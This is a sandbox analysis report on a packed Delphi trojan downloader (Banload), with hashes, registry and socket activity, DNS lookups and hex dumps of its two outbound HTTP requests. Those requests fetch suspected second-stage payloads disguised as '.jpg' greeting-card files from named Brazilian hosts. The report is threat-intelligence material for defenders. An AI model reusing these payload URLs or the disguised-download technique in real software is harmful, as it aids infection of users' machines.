Analysis Date: 2013-12-27 00:19:53
MD5: 1e838696e99c330c8850ac0de753d0e9
SHA1: 297fde554740f9b26ec90100515e63f69cc20794
(No SHA-256 is recorded for this sample; when sharing or matching indicators, do not rely on the MD5 alone — it is collision-prone — and prefer the SHA1 until a SHA-256 can be computed from the file itself.)

Static Details:
(Note: four of the eight sections below have size 0 and carry the md5/sha1 of zero bytes — d41d8cd9…/da39a3ee… — i.e. they are empty in the on-disk image, consistent with the Petite packer collapsing the original sections. Only the packer stub, resources and the compressed payload section have content; unpack the sample before drawing conclusions from section hashes or static strings.)

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: ab73c0544b4638106b053c0d013ab3b9 sha1: 6eb5e57802e811d2c0557469ce79bbf70be3e7b3 size: 18432
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.petite md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: 31162c9a6c33a3466b9d89ba82106627 sha1: 84985cfdb951b1db5518e6eb7d017369f098064e size: 512
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 8603c3b1d909916ed697e74de7c8ad48 sha1: 4434fd917163e4da9ee26c2238e14c722418978c size: 1413
Section md5: 39d864adc37b90661bdd635464adedb1 sha1: 0dc8bbb2124535028d8975502ce1050bf54036ab size: 6656
Timestamp: 1992-06-19 22:22:17 (this is the fixed default link timestamp written by the Borland Delphi linker, not a real build time — consistent with the Delphi-generic AV label below; do not use it to date the sample)
Packer: Petite v2.2 -> www.un4seen.com/petite
PEhash: 82a83a48fc0f2003aa815c736e637a56af195999
AV (avg): Downloader.Small.56.U
AV (msse): TrojanDownloader:Win32/Banload.gen!F
AV (avira): TR/Dldr.Delphi.Gen
AV (mcafee): Downloader.ea
(All four vendors classify the sample as a generic downloader; the Banload family name and the Portuguese-language URLs below point to a Brazilian banking-trojan loader, but the page shows no downloaded payload, so the final stage is not identified here.)

Runtime Details:

Screenshot

Process
↳ C:\malware.exe (sandbox-assigned path; the sample's original filename is not recorded on this page)

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
(Both keys are the Internet Settings proxy configuration, which is consistent with the URLDownloadToFileA / URLMON.DLL import visible in the Strings section — the urlmon/WinINet stack consults these keys before connecting. The report does not say whether these were reads or writes; treat them as benign proxy lookups unless a write is confirmed.)
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
(The Afd device handles are the kernel side of Winsock socket creation and async connect; the lsarpc pipe open is a common side effect of name resolution / security-context calls on Windows XP. None of these by themselves indicate persistence or privilege escalation.)
Winsock DNS: www.helenice.com
Winsock DNS: paginas.terra.com.br
Winsock URL: http://www.helenice.com/Cartao%20Natal.jpg.jpg
Winsock URL: http://paginas.terra.com.br/relacionamento/cartaodeamor/update.jpg
(The ".jpg" / double ".jpg.jpg" extensions are very likely cosmetic: a downloader has no reason to fetch images, and "Cartão Natal" / "cartão de amor" ("Christmas card" / "love card") are the lure names. The capture below shows only the outbound requests and no response bodies, so the fetched content cannot be confirmed from this page — treat both URLs as suspected second-stage payload locations.)

Network Details:

DNS: www.terra.com.br
Type: A
200.154.56.80
DNS: helenice.com
Type: A
174.120.99.194
DNS: paginas.terra.com.br
Type: A
DNS: www.helenice.com
Type: A
(The two hostnames the sample actually queried — paginas.terra.com.br and www.helenice.com — show no A record here, while the two it did not query do. Together with the TCP flows below going to 200.154.56.80 and 174.120.99.194, this is consistent with the queried names being CNAMEs to www.terra.com.br and helenice.com respectively; the page does not show the CNAME answers, so verify before treating the apex names as indicators. Note that IP-based indicators from 2013 shared hosting are likely stale and may be re-used by unrelated sites.)
HTTP GET: http://paginas.terra.com.br/relacionamento/cartaodeamor/update.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.helenice.com/Cartao%20Natal.jpg.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
(The User-Agent is the stock IE6 / Windows XP string the sandbox's WinINet stack would send on behalf of URLDownloadToFileA, not a value chosen by the malware, so it is not a useful detection signature on its own; the request paths and hostnames are the distinguishing indicators.)
Flows TCP: 192.168.1.1:1032 ➝ 200.154.56.80:80
Flows TCP: 192.168.1.1:1033 ➝ 174.120.99.194:80

Raw Pcap (outbound HTTP requests only; no responses were captured. In the second dump the request ends with the terminating CR LF CR LF at offsets 0xDA–0xDD; the bytes that follow, "tion: Keep-Alive\r\n\r\n", are identical to the first request's bytes at the same offsets 0xDE–0xF1 and appear to be buffer residue from the dump rather than data on the wire — the second request is 222 bytes, not 242.)
0x00000000 (00000)   47455420 2f72656c 6163696f 6e616d65   GET /relacioname
0x00000010 (00016)   6e746f2f 63617274 616f6465 616d6f72   nto/cartaodeamor
0x00000020 (00032)   2f757064 6174652e 6a706720 48545450   /update.jpg HTTP
0x00000030 (00048)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000040 (00064)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000050 (00080)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000060 (00096)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000080 (00128)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000090 (00144)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000a0 (00160)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000b0 (00176)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000c0 (00192)   3a207061 67696e61 732e7465 7272612e   : paginas.terra.
0x000000d0 (00208)   636f6d2e 62720d0a 436f6e6e 65637469   com.br..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f436172 74616f25 32304e61   GET /Cartao%20Na
0x00000010 (00016)   74616c2e 6a70672e 6a706720 48545450   tal.jpg.jpg HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000040 (00064)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000050 (00080)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000060 (00096)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000070 (00112)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a207777 772e6865 6c656e69 63652e63   : www.helenice.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a7469   Keep-Alive....ti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..


Strings
(Extracted from the packed image, so most of the original program's literals are hidden; the readable entries are mainly the Petite unpacker stub (".petite", "Corrupt Data!", "ERROR!", LoadLibraryA / GetProcAddress / VirtualProtect) and Delphi resource names (DVCLAL, PACKAGEINFO). The surviving import names — URLDownloadToFileA / URLMON.DLL, RegCloseKey, MessageBoxA, wsprintfA — are the most useful static indicators of downloader behaviour and match the network activity observed above.)
#+3;CScs
DVCLAL
PACKAGEINFO
`3n16L
6!%6s|
9"K8kq
advapi32.dll
akb0%NN
^>!BJOf8
CharNextA
Corrupt Data!
,DDA$X
^DrM|]
[ejq+E
ERROR!
ExitProcess
'f$alt
f+It.%
f(j=m+{
GetACP
GetModuleHandleA
GetProcAddress
g"(f~-
GlobalAlloc
GlobalFree
kernel32.dll
KFwj&B
KkHkB=
k~>XY 
LoadLibraryA
LocalAlloc
 =Lzwz
[m+|9C
mctV+KhUV~7
MessageBoxA
oleaut32.dll
.petite
.[RD#]
RegCloseKey
sAnjaiY
 s"j'X+
SysFreeString
This program must be run under Win32
URLDownloadToFileA
URLMON.DLL
user32.dll
VirtualProtect
Wiws9JZ
WQ9K(>/La
wsprintfA
^xR##iTI
XZyaafY
>Y4V?3
y\z_r+r]